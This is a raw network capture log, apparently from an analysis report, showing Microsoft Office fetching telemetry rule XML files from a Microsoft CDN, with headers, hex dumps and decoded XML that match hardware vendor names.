                                                                                                                                                                                        x-azure-ref: 20241124T011323Z-178bfbc474b7cbwqhC1NYC8z4n000000053000000000g9mq
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:23 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        12192.168.2.54972113.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:23 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:24 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:23 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 2980
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                        ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                        x-ms-request-id: 89a9fa5c-d01e-0017-5438-3cb035000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011323Z-178bfbc474btvfdfhC1NYCa2en00000005cg000000004yff
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:24 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        13192.168.2.54972013.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:23 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:23 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 408
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                        ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                        x-ms-request-id: f3d0c3d3-f01e-003c-676b-3b8cf0000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011323Z-178bfbc474bwh9gmhC1NYCy3rs00000005a000000000cf47
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:24 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        14192.168.2.54971913.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:23 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:23 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 450
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                        ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                        x-ms-request-id: 3ae325a6-f01e-001f-6051-3c5dc8000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011323Z-15b8b599d889gj5whC1TEBfyk000000003dg00000000rsm4
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:24 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        15192.168.2.54972413.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:25 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:25 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 474
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                        ETag: "0x8DC582B9964B277"
                                                                                                                                                                                        x-ms-request-id: 4712fcc8-d01e-002b-279a-3b25fb000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011325Z-174c587ffdfcj798hC1TEB9bq400000003xg0000000076cr
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:26 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        16192.168.2.54972613.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:25 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:26 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 632
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                        ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                        x-ms-request-id: d8f13441-a01e-0021-5e2d-3c814c000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011326Z-178bfbc474bbbqrhhC1NYCvw7400000005d000000000anrx
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:26 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        17192.168.2.54972513.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:25 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:26 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                        ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                        x-ms-request-id: 30601852-401e-0047-7476-3b8597000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011326Z-174c587ffdfcj798hC1TEB9bq400000003ug00000000h591
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:26 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        18192.168.2.54972813.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:25 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:26 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 467
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                        ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                        x-ms-request-id: ba9b913e-601e-0001-2f1a-3dfaeb000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011326Z-178bfbc474b9xljthC1NYCtw940000000570000000005vu2
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:26 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        19192.168.2.54972713.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:25 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:26 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:26 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 471
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                        ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                        x-ms-request-id: 4bad8666-601e-0032-490e-3eeebb000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011326Z-178bfbc474bmqmgjhC1NYCy16c00000005eg00000000011m
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_MISS
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:26 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        20192.168.2.54973013.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:27 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:28 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 407
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                        ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                        x-ms-request-id: 5235ff2f-501e-008f-1c4e-3c9054000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011328Z-178bfbc474bxkclvhC1NYC69g4000000053000000000k5fr
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:28 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        21192.168.2.54973113.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:27 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
